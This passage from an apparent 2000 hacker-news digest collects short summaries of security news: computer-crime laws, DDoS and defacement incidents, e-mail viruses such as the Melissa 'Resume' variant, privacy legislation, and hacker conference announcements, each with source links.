announced that they are working on a bill to increase the sentences for computer attackers. The new bill would double the maximum jail term to ten years for convicted computer attackers. The legislation will probably be introduced later this week.

(Increased jail time only costs the taxpayer money and does nothing to prevent other crimes or reform the perpetrator.)

Newsbytes
http://www.newsbytes.com/pubNews/00/149449.html

@HWA

68.0 [HNN] May 23'00 Australia Loses Sensitive Laptops
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

Five laptops have turned up missing and are presumed stolen in what looks like an inside job at Australia's Parliament House. The laptops have been valued at $30,000 ($17,169 U.S.D.) and could allow intruders access to the parliamentary network.

Australian IT
http://australianit.com.au/common/storyPage/0,3811,715221%255E442,00.html

@HWA

69.0 [HNN] May 23'00 Hong Kong to Create Cyber Response Team
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

The Deputy Secretary for Information Technology and Broadcasting, Alan Siu Yu-bun, has said that an agreement has been reached in principle to create a Computer Emergency Response Team. It is hoped that the Team will not be a government agency but will instead form as a non-profit organization. Funding for the Team will hopefully come from the Information and Technology Fund.

Hong Kong Standard
http://online.hkstandard.com/today/default.asp?PageType

@HWA

70.0 [HNN] May 23'00 South Africa Forms CyberCrime Unit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Roelof

Nasser Mohammed, the director of crime services at the South African Police Services (SAPS), has announced the creation of the South African Cybercrime Unit. Officials are actively searching for recruits to the new posts and have not as yet determined its size.
Net Assets
http://www.netassets.co.za/netassets/sitewide/content/direct/1,2275,621905-5858-0,00.html

@HWA

71.0 [HNN] May 24'00 Info-Con Ratings To Be Used for Cyber Threats
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

The Pentagon has decided to post threat condition assessments when it is under an information warfare attack. Info-Cons, or "information conditions", will be decided by US Space Command, which is the home of JTF-CND. Reactions to Info-Con warnings could range from rejecting e-mails from unknown addresses to shutting down the networks. It is hoped that "Information Condition" warning levels will be defined within the next few weeks.

ABC News
http://abcnews.go.com/sections/tech/DailyNews/pentagon000523.html

@HWA

72.0 [HNN] May 24'00 Ticketmaster to Sell RootFest Tickets
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by lothos

RootFest tickets are now available via all TicketMaster locations, including their web site. Tickets can still be purchased during the event at the RiverCentre Box Office. Rootfest, the Midwest's premier computer security event, will be held June 14 - 16 in Minneapolis, Minnesota.

TicketMaster
RootFest
https://ticketing.ticketmaster.com/cgi/purchasePage.asp?event_id
http://www.rootfest.org

@HWA

73.0 [HNN] May 24'00 Zero-Knowledge Teams With IBM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Craig

Zero-Knowledge Systems and IBM announced yesterday at ISPCON in Orlando that they will partner to offer privacy solutions to ISPs. Over the next 12 months, IBM and Zero-Knowledge(r) will install 1,000 IBM Netfinity 4000R servers running Zero-Knowledge's Freedom software at hundreds of ISPs and telecommunication backbone nodes throughout the world to expand the cryptographically assured global privacy infrastructure of the Freedom network. At Internet World in London Zero Knowledge announced an alliance with Carrier1 International S.A.
to enable private Internet use for European citizens by deploying Freedom Network servers at major routing points across Europe. Zero Knowledge http://www.zeroknowledge.com @HWA 74.0 [HNN] May 24'00 The Little Miscreants That Could ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by evenprime Mafiaboy and Curador, investigated and discovered by the FBI, or where there other people involved? Is the FBI really that good as to be able to track these teenage troublemakers down? ZD Net http://www.zdnet.com/zdnn/stories/comment/0,5859,2573856,00.html @HWA 75.0 [HNN] May 24'00 French Say No Anonymity on Web ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse Sponsored by the French Government the Liberty of Communication Act would require all web publishers to register with authorities. This would essentially eliminate all anonymous web postings. The legislation, passed has passed the French House and being debated in the Senate this week, would apply to any company that hosts World Wide Web pages viewable by the public. Associated Press - via San Jose Mercury News http://www.mercurycenter.com/svtech/news/breaking/ap/docs/25664l.htm @HWA 76.0 [HNN] May 24'00 Experts Stress Education Over Laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench During the National Colloquium for Information Systems Security Education in Washington, D.C. experts stressed that education, research and development programs, are where the solutions to cybercrime will come from and not more laws and jail time. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0522/web-cyber-05-24-00.asp @HWA 77.0 [HNN] May 25'00 NHL Hit with DDoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse The National Hockey League was hit with a Distributed Denial of Service attack on Sunday which knocked it off line. NHL technicians where still trying to filter out the illegitimate requests yesterday. 
The league has said that it has filed a formal complaint with the FBI and have asked several security firms to help. Associated Press - via San Jose Mercury News http://www.mercurycenter.com/svtech/news/breaking/ap/docs/31233l.htm @HWA 78.0 [HNN] May 25'00 FCC Rules Under Appeal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The US Court of Appeals in Washington is hearing arguments regarding rules issued last year by the FCC. The rules spell out how telecommunications carriers will need to comply with the Communications Assistance Enforcement Act (CALEA). The rules require carriers to impliment technology to pinpoint celluar phone users without a warrant and give the FBI the capability to intercept Internet traffic. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2570897,00.html?chkpt @HWA 79.0 [HNN] May 25'00 Privacy Issue Still Hot In DC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by root66 Sen. Fritz Hollings (D-S.C.), will introduce legislation that will require Web sites to conform to the FTC's fair information practices, meaning that they would have to provide consumers notice about, consent for and access to information collected online, as well as ensure security of that data. The Senate Commerce Committee will hold a hearing Thursday on the FTC's recommendation that the government needs to force web sites to comply with privacy initiatives. The FTC has been accused of wanting to regulate the problem as opposed to identifying the cause and finding solutions. 
Civic.com
http://www.civic.com/civic/articles/2000/0522/web-3ftc-05-24-00.asp

@HWA

80.0 [HNN] May 25'00 Australia Electoral Information Sold For Tax Mailing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by hool54000
Following the revelation two weeks ago that Canada maintains a massive database on its citizens, it has now been learned that the Australian Electoral Commission has sold the information it had (age, address, marital status, etc.) to the taxation department. The Australian Taxation Office used the information to conduct a mass mailing about new taxation laws.

Australian Broadcasting Commission
News Limited
http://www.abc.net.au/news/2000/05/item20000525004954_1.htm
http://www.news.com.au/common/story_page/0,4057,726998%255E1702,00.html

@HWA

81.0 [HNN] May 25'00 Cybercops Meet in Boston
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by no0ne
Attorney Generals from the state of Massachusetts and other law enforcement personnel will gather in Waltham, MA, for a conference on computer crime. Other attendees include Weld Pond from the @stake L0pht Labs. The discussion will center around the 'new criminal frontier', how to assess a network's vulnerabilities, and what options are available for cybercrime victims. The conference will be held from 1 p.m. to 5:30 p.m. today at the Westin Hotel in Waltham, MA.

Boston Herald
http://www.bostonherald.com/business/technology/hack05242000.htm

@HWA

82.0 [HNN] May 25'00 CERT Releases Advisory on Week Old Issue
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Space Rogue
The Computer Emergency Response Team at Carnegie Mellon has issued advisory CA-2000-07 regarding the Microsoft Office 2000 UA ActiveX Control. The advisory was issued yesterday in the late afternoon. The @stake L0pht Labs initially released their advisory, demonstration code, and patch ten days before.

@stake L0pht Labs
CERT
Microsoft
http://www.l0pht.com/advisories/msoua.txt
http://www.cert.org/advisories/CA-2000-07.html
http://microsoft.com/technet/security/bulletin/ms00-034.asp

@HWA

83.0 [HNN] May 26'00 Physical Security Is Real Weak
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Evil Wench
A report issued by the General Accounting Office details how armed investigators breached security at several government installations using phony IDs and credentials purchased off the Internet. At the Pentagon, CIA, Justice Department, FBI, State Department and 14 other agencies, investigators were able to gain access to the buildings without being searched and were often waved past security checkpoints.

Knight Ridder - via The Age
CNN
http://www.theage.com.au/breaking/0005/25/A17287-2000May25.shtml
http://www.cnn.com/2000/US/05/24/security.breaches/index.html

@HWA

84.0 [HNN] May 26'00 Reno Does About Face
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by tjadams69
"I think any time you expose vulnerabilities it's a good thing," said Attorney General Janet Reno. Her comment was directed to investigators who posed as false security agents to gain access to supposedly secure government buildings. How does 'exposing vulnerabilities' go from good in the real world to bad in the cyber world?

CNN
http://www.cnn.com/2000/US/05/25/security.breaches.01/index.html

@HWA

85.0 [HNN] May 26'00 Extortionist Busted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by no0ne
A single charge of using the internet to send extortion threats has been filed against Rob Holcomb. Via his e-mails to Audible Inc., a New Jersey based company which sells online books, the 36-year-old graduate student of Colorado State University claimed to have found a way to download the books for free and would not reveal the system's weakness except in exchange for money, a car and unlimited free downloads of the company's content. Audible contacted the police, who traced the alleged perpetrator after he gave the company a mailing address and phone number at the school. Holcomb could face up to two years in prison and a $100,000 fine.

Associated Press - via Las Vegas Sun
Internet News
http://www.lasvegassun.com/sunbin/stories/tech/2000/may/25/052500388.html
http://www.internetnews.com/bus-news/article/0,2171,3_380531,00.html

@HWA

86.0 [HNN] May 26'00 Australian Man Leaks Sewage Via Computer and Radio
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Evil Wench
An alleged computer intruder used radio transmissions to alter sewage pump stations, causing raw sewage to overflow on Queensland's Sunshine Coast. The 49-year-old Brisbane man is expected to face 371 charges when he appears in the Maroochydore Magistrates Court on June 15. The charges include stealing, computer intrusion and using radio communications equipment without authority.

AAP Newsfeed - via Lexis-Nexis
http://web.lexis-nexis.com/more/cahners-chicago/11407/5873217/1

@HWA

87.0 [HNN] May 26'00 2600 Keeps Lawyer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Macki
Judge Kaplan has ruled that the law firm Frankfurt, Garbus, Klein & Selz can continue to represent 2600 in their battle against Time Warner and the other plaintiffs over the posting of the DeCSS code. The plaintiffs had argued that due to the firm's representation of Time Warner in other matters it would be a conflict of interest to represent 2600. The Judge disagreed.

2600
http://www.2600.org/news/2000/

@HWA

88.0 [HNN] May 26'00 Preliminary Defcon Speaking Schedule
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by DTangent
In preparation for Defcon 8, to be held in Las Vegas at the end of July, organizers have released a preliminary speaking schedule. Organizers have also updated the media archives section of the site, containing film clips, documentaries and other tidbits from Defcons past.

Defcon 8
http://www.defcon.org/

@HWA

89.0 [HNN] May 26'00 Underground Sites Form Alliance
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Gh0zT
A new alliance has been announced between established computer security sites including the Fringe of the Web and Project Gamma. This new alliance hopes to increase the quality of content available to its member sites.

Iron Box Technologies
http://www.ironboxtech.com/

@HWA

90.0 [HNN] May 30'00 Viruses, Viruses, and more Viruses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by acopalyse and Weld Pond
Computer Associates has warned about a dangerous new virus called Cybernet, which spreads by attaching to outgoing e-mail just like the Melissa Virus. Cybernet infects Microsoft Word and Excel files. The e-mail arrives with a subject line "You've GOT Mail !!!" and the text of the message reads: "Please, save the document after you read and don't show to anyone else."

Newsbytes

Kak Spreading Fast
ShoppingPlanet.com accidentally infected 50,000 of its customers when it mailed its newsletter out. The newsletter was infected with the Kak virus. The company quickly sent out a follow-up email warning users not to open the previous email. Kak requires no user intervention other than opening the email. Anti-virus software vendors have included the virus in their definitions files. Kak only spreads via MS Outlook users; Microsoft issued a patch last year to correct the problem.

ZD Net

91.0 [HNN] May 30'00 Resume on the Loose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A new variant of the old Melissa virus is spreading rapidly. This new variant has a much deadlier payload that will delete the contents of the system and root directories of Windows and Windows NT.
It arrives as an attachment with a subject line of 'Resume - Janet Simons'.

C|Net
Tech Web
MSNBC
ABC News
CNN
Microsoft - Outlook Email Security Update
Norton
Symantec
http://www.newsbytes.com/pubNews/00/149635.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2578234,00.html
http://news.cnet.com/news/0-1005-200-1960645.html
http://www.techweb.com/wire/story/TWB20000526S0016
http://www.msnbc.com/news/412717.asp
http://abcnews.go.com/sections/tech/DailyNews/virus000527.html
http://www.cnn.com/2000/TECH/computing/05/27/new.virus.resume/index.html
http://officeupdate.microsoft.com/2000/articles/Out2ksecarticle.htm
http://vil.nai.com/villib/dispvirus.asp?virus_k
http://www.symantec.com/avcenter/venc/data/w97m.melissa.bg.html

@HWA

92.0 [HNN] May 30'00 Gauntlet Firewall Breached
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by no0ne
"The world's most secure" firewall was breached during a routine security audit by Jim N. Stickley, an employee of Garrison Technologies in Austin, TX. The hole, a modified buffer overflow attack, could allow an intruder to control the firewall box. Network Associates has issued a patch for the problem.

Business Week
Network Associates
http://www.businessweek.com/bwdaily/dnflash/may2000/nf00526f.htm
http://www.nai.com/

@HWA

93.0 [HNN] May 30'00 Software Glitch Short Changes Lottery Winners
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by acopalyse
A former employee of GTech Holdings says the U.S. firm knew a computer software glitch was short-changing some British lottery winners but held off telling the operator, Camelot Group. Britain's independent National Lottery Commission (NLC) said last Saturday the defect caused computers to think there were more winners than there actually were, diluting the prize pool.

Reuters - via San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/reuters/docs/39166l.htm

@HWA

94.0 [HNN] May 30'00 Cyberstalking: Hype or Reality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Lewis
Just how serious is cyberstalking? Some estimates put the number of stalkers at 200,000, but no one really knows where that number came from. Sure, there have been real world victims, but does it warrant all the hype?

ZD Net
http://www.zdnet.com/intweek/stories/columns/0,4164,2577187,00.html

@HWA

95.0 [HNN] May 30'00 Sexy Geeks and Hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Weld Pond
Free software advocates and free love advocates seem to populate similar groups, but does membership in one automatically mean you're a member of the other?

Salon
http://www.salon.com/tech/feature/2000/05/26/free_love/index.html

@HWA

96.0 [HNN] May 30'00 DC Metro Web Site Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Evil Wench
The web site of the Washington DC Metropolitan Transit Authority was defaced yesterday by someone who apparently did not appreciate the actions of the rock group Metallica. The defaced page contained numerous obscenities and criticism of the band's lawsuit against Napster.

Associated Press - via Washington Post
Attrition.org - mirror of defaced page
http://www.washingtonpost.com/wp-dyn/articles/A26914-2000May29.html
http://www.attrition.org/mirror/attrition/2000/05/29/www.wmata.com/

@HWA

97.0 [HNN] May 30'00 Mitnick to Challenge Computer Ban
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by acopalyse
Publisher Steven Brill, who wants to hire Kevin Mitnick as a columnist, has retained the services of esteemed New York attorney Floyd Abrams. Abrams will file a friend of the court brief to assist Kevin in his fight to lift the bail restrictions placed on him to prevent him from speaking his mind and earning a living.

C|Net
http://news.cnet.com/news/0-1005-200-1951220.html?tag

@HWA

98.0 [HNN] May 30'00 Black Hat Posts Speaker Lists, Adds Old Video Clips
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Dark Tangent
The Blackhat web site has added video on-line from past shows, including an excellent keynote speech from Marcus Ranum on how to "really" secure the Internet, a must see. Presentations from BH Asia are available as well, with video added shortly. At BH US this year there will be new security vulnerabilities discussed, including transitioning from ring 3 to ring 0 in Windows NT (breaking their security model), tricks for defeating parts of Firewall-1, and Mudge will talk in depth on passive detection techniques for locating sniffers, based on his work with Anti-sniff.

Blackhat
http://www.blackhat.com

@HWA

99.0 [IND] Pokemon virus hits U.S. targeting kids
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cuddly Pokemon Virus Targets Kids
By Richard Meares, Reuters
August 24, 2000

Children everywhere beware — Pikachu is not as cuddly as he seems. The Pokemon character has mutated into a nasty little virus, spreading via email like the devastating "Love Bug" did.

Virus experts said Thursday that the cute yellow rabbit-like creature, a darling of the Pokemon videogame family, is appearing in the United States as a computer virus, wrecking PCs by wiping out their system files.

'These computers may take you into cyberspace, but they are also running the world.' -- Eric Chien, Symantec

So far "Pokey" has sown only a fraction of the havoc its famous predecessor did, but he's giving both computer experts and parents cause for concern. Kids, not corporations, are the target of the cybervandals this time.

"We haven't seen viruses or worms targeted at children before," said Eric Chien, chief researcher at antivirus company Symantec's Dutch laboratory. "This is the first one."

"Since it comes as a little Pokemon animation, 10-year-olds are likely to be more interested in double-clicking on it."

Viruses infect a computer and cause damage, but rely on users to unwittingly spread them from one computer to another. Worms find their own way to spread, usually on the Web.

This worm appears as an email with the title "Pikachu Pokemon" and the message "Pikachu is your friend." Japanese antivirus firm Trend Micro advises anyone who receives the email to delete the file without opening it.

Pokey bites less but bites harder

Earlier this year, the Love Bug raced around the world and caused damage estimated from hundreds of millions to billions of dollars. Many major corporations were forced to shut down their internal communications to stamp it out.

It came as an email entitled "ILOVEYOU" with an attachment that, if opened, infected the computer and emailed itself to everyone in the user's Microsoft Outlook address book.

Pokey, aimed at children hooked on the worldwide Pokemon craze, has spread more slowly and has not gone as far, giving antivirus software companies like Symantec, Trend Micro, and Britain's Sophos time to mount a defense.

But once Pokey gets into your computer, its bite is far more deadly than the Love Bug's. It destroys all files in the Windows and System directories. The Microsoft operating system, used by four-fifths of the world's computers, must be reinstalled from scratch.

The Love Bug's most prevalent versions attacked data files such as pictures, but left the whole system intact.

People want to be liked -- that's their weakness

With 50,000 worms wriggling around cyberspace, Chien said the key to an effective one is to appeal to human emotions.

"Love Bug was not really new but the reason it hit so many people was social engineering. These things require people to double-click on them to run them. And who doesn't like to receive a love letter?"
Nintendo, the videogame company that owns the copyright to the wildly popular Pokemon — or "pocket monster" — characters, was unavailable for comment.

Trend Micro said that, surprisingly, the worm had not surfaced in Japan yet. Europe also seems to be little affected so far.

Ironically, the Love Bug and the earlier Melissa virus may have helped computer users defend themselves against viruses. They attracted so much attention that many users now know they should treat unsolicited email attachments with suspicion.

Pokey, however, targets a group of users who are not virus-savvy — young children.

Chien warned that as the mobile Internet grows, so will the risk of new viruses that target cell phones and online pocket organizers. So far, however, these devices have only suffered text-message (SMS) bombardments.

Chien advised people to practice safe surfing — since suspect websites could also contain viruses — and to preach it to children. He said people should stop thinking of computers as some kind of link to a virtual world where real damage could not be done.

"These computers may take you into cyberspace — but they are also running the world," he warned.

Copyright © 2000 Reuters Limited.

@HWA

100.0 [HNN] May 31'00 Canada To Dismantle Big Bro Database
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by freedom
Human Resources Minister Jane Stewart has relented to public pressure and has announced that the massive database containing information on nearly every Canadian is to be dismantled. The Longitudinal Labor Force File has already severed links with databases at the Revenue Department and other agencies. She said she will also be recommending legal protections for the information used in her department. Some experts doubt that the government will simply delete the data.

Globe and Mail
Ottawa Citizen
Wired
Newsbytes
Canoe.com
http://www.globeandmail.ca/gam/National/20000530/UBIGGN.html
http://www.ottawacitizen.com/national/000530/4185962.html
http://wired.com/news/politics/0,1283,36649,00.html
http://www.newsbytes.com/pubNews/00/149805.html
http://ads.canoe.ca/CNEWSTopNews/bigbro_may30.html

@HWA

101.0 [HNN] May 31'00 Resume Causes Little Damage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Evil Wench
The much hyped 'Killer Resume' worm died a quiet death over the weekend, causing very little damage. It was feared that the Melissa variant would spread extremely fast on Tuesday morning when people came into work after the long holiday weekend.

TechWeb
Associated Press - via Nando Times
http://www.techweb.com/wire/story/TWB20000530S0012
http://www.nandotimes.com/technology/story/body/0,1634,500210254-500294870-501612274-0,00.html

@HWA

102.0 [HNN] May 31'00 Hong Kong Piracy Troubles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by acopalyse
More than half of all software used in Hong Kong is pirated. According to the BSA-commissioned survey, losses from software piracy exceeded $12 billion worldwide in 1999 and topped $59 billion over the last five years.

CNN
http://www.cnn.com/2000/ASIANOW/east/05/29/hk.piracy.reut/index.html

@HWA

103.0 [HNN] May 31'00 New Zealand Man Claims Virus Info Stolen
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by William Knowles
A New Zealand man claims that he has stumbled onto the biggest hole in MS Outlook yet. The hole would allow malicious Java code to be executed on a Windows/Outlook machine without any user intervention. He said that soon after he contacted Microsoft the information was stolen off his computer by someone who broke into it. Microsoft says that they never received his initial communication and, after reviewing his information, claim that there is no security breach involved.

The New Zealand Herald
http://www.herald.co.nz/storydisplay.cfm?storyID

@HWA

104.0 [HNN] May 31'00 Bank Manager Executed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by root66
After manipulating computer records to divert money into his own accounts, Shen Weibiao, the former bank manager of a Bank of China branch in Shaoguan city, was executed after the Supreme People's Court rejected his appeal. While the means of his execution was not released, most mainland China executions are done by gunshot.

South China Morning Post
http://www.scmp.com/News/China/Article/FullText_asp_ArticleID-20000530131544704.asp

@HWA

105.0 [HNN] May 31'00 Malaysian ISP Suffers Human Error Security Breach
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by dhillon
Mimos Berhad, a government funded research corporation and ISP, has admitted that an employee accidentally placed a large number of confidential files on a publicly accessible web server.

Newsbytes
http://www.newsbytes.com/pubNews/00/149718.html

@HWA

106.0 [HNN] May 31'00 Defcon Updates Web Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Dark Tangent
Defcon has updated its site with a more complete list of speakers and DJs for this year's convention in Las Vegas. Some lost video from DC 2 and DC 6 has been found and put on-line! What did Artimage look like six years ago? Now the truth can be seen! Bonus: The writer of "Enemy of the State" will be screening a copy of the movie on the roof, and take Q&A after. Can't make it this year? There will be streaming media of the talks and DJs available.

Defcon 8
http://www.defcon.org

@HWA

107.0 [HNN] May 31'00 SWAT Hits Issue 29
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by The Firestarter
The UK's longest running underground e-zine, SWAT, has just released its 29th issue on their web site.

Swateam
http://www.swateam.org

@HWA

108.0 [HNN] June 01'00 Pennsylvania Passes Anti-Virus Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by acopalyse
It is now a crime to spread computer viruses in Pennsylvania. Legislation signed last week will carry a seven-year jail sentence, including damage reimbursement, for those found guilty.

Newsbytes - via Yahoo
http://asia.dailynews.yahoo.com/headlines/technology/article.html?s

@HWA

109.0 [HNN] June 01'00 MLB Practices Security Through Obscurity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Evil Wench
Determined not to have a repeat of last year, Major League Baseball has initiated an email address verification scheme during its All-Star balloting. Last year the ballot box for Boston Red Sox shortstop Nomar Garciaparra was fraudulently stuffed with 39,000 extra ballots. This year all email addresses will be verified and audited by a secret system. "There are a few folks out there we'd just assume not know what we're doing," said Tim O'Mara, senior vice president of operations for Bellevue, Wash.-based SeasonTicket.com Inc., which is in charge of this year's electronic tabulations. (Failing to make the procedure public invites suspicion on the integrity of the overall process as well as inviting people who are looking for a challenge.)

Computer World
http://www.computerworld.com/home/print.nsf/all/000526E3A2

@HWA

110.0 [HNN] June 01'00 Pr0n Detection Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by no0ne
Software that scans photos for flesh tones and curves to detect nudity is being beta tested by Oklahoma based company Heartsoft Inc. Heartsoft has applied for a patent for this technology. It will be used in conjunction with the company's Internet Safari browser for children. (I can think of a few other good uses as well.)
Newsbytes
http://www.newsbytes.com/pubNews/00/149866.html

@HWA

111.0 [HNN] June 01'00 Fighting the Privacy Bootleggers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by root66
The Gramm-Leach-Bliley Act has made it extremely easy for banks, insurance companies, and investment corporations to compile, share and sell information about you. Prohibited from doing so since the Great Depression, these companies are now able to cross reference their databases and come up with all sorts of information about you. Yes, there are ways to Opt-Out, but they are difficult and arcane.

PC World - via CNN
http://www.cnn.com/2000/TECH/computing/05/31/privacy.law.idg/index.html

@HWA

112.0 [HNN] June 01'00 Marcia Clark Calls Hackers "Undersocialized Schizoids"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Commodore Sloat
Well-dressed former prosecuting attorney Marcia Clark (yeah yeah, from the OJ trial) has a column on APB News where she lambastes hackers as pathological misfits "of barely average intelligence." As is typical of such columns, "hackers" are lumped together with any criminal with a computer.

APB News
http://apbnews.com/newscenter/clark/2000/05/31/clark0531_01.html

@HWA

113.0 [HNN] June 01'00 Fake Census Takers on the Prowl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Evil Wench
In an effort to scam people out of their Social Security and bank account numbers, people posing as Census takers are calling on households. There have been scattered reports of impostors in Arkansas, North Dakota, and northeastern Pennsylvania. The con artists seem to be targeting elderly people.

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000601/pl/census_scams_1.html

@HWA

114.0 [HNN] June 02'00 Top Ten Internet Security Problems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Marc
The SANS Institute has issued a report detailing the top ten security issues facing the Internet today. They include weaknesses in BIND, CGIs, RPCs, RDS, Sendmail, global file sharing, weak user IDs and passwords, IMAP and POP buffer overflows, and SNMP community strings set to 'public'. The report describes each problem, lists CVE entries and offers advice on how to correct the issue.

SANS
PC World
Federal Computer Week
http://www.sans.org/topten.htm
http://www.pcworld.com/pcwtoday/article/0,1510,17005,00.html
http://www.fcw.com/fcw/articles/2000/0529/web-topten-06-02-00.asp

@HWA

115.0 [HNN] June 02'00 MPAA Attempts to Bar Press From Hearings
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Macki
Lawyers for the Motion Picture Association of America have asked the court to seal the upcoming hearings involving 2600 and to keep court records private. The MPAA feels that releasing the names of its employees involved in anti-piracy efforts would place them in harm's way. They are also concerned about releasing information regarding their anti-piracy operations.

2600
Court Brief
http://www.2600.com/news/2000/0601.html
http://www.2600.com/dvd/docs/2000/0531-mpo.html#kaj

@HWA

116.0 [HNN] June 02'00 Anti-Virus Vendors Blame Media for Virus Hype
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by root66
Anti-virus vendors are calling for an established, unified grading system to categorize viruses, to prevent the media from getting into a feeding frenzy and spreading hype and misinformation (aka FUD). They cite the recent 'resume' scare as an example.

Silicon.com
http://www.silicon.com/a37811

@HWA

117.0 [HNN] June 02'00 Summercon 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Evil Wench
Summercon 2000, presented by r00t, Phrack Magazine, FEH, & 9mm, will be held this weekend, June 2nd through the 4th. The conference will be at the Omni Hotel @ CNN Center in Atlanta, GA. Summercon is the longest continuously run con still in existence.

Summercon
http://www.summercon.org/

@HWA

118.0 [HNN] June 02'00 India's First Cyber Criminal Arrested
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by no0ne
A 24 year old computer engineer has been arrested by the Indian Police for stealing over 100 hours of internet time. After being called to activate the account of a retired army officer, the service engineer changed the password of the account and later accessed it from 10 different locations.

BBC
http://news.bbc.co.uk/hi/english/world/south_asia/newsid_773000/773025.stm

@HWA

119.0 [HNN] June 02'00 Libnet for NT Now Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Marc
eEye Digital Security has released LibnetNT as an open source project to help speed development. LibnetNT is similar to the popular Unix Libnet, which is used to implement low level packet functionality in a program. LibnetNT has the exact same functionality and abilities as Libnet, except LibnetNT can be used to develop low level packet injection programs on Windows NT4.0 and Windows NT5.

eEye Digital Security
http://www.eeye.com/html/Databases/Software/libnetnt.html

@HWA

120.0 [HNN] June 05'00 FW-1 Vulnerable to Fragmented Packets
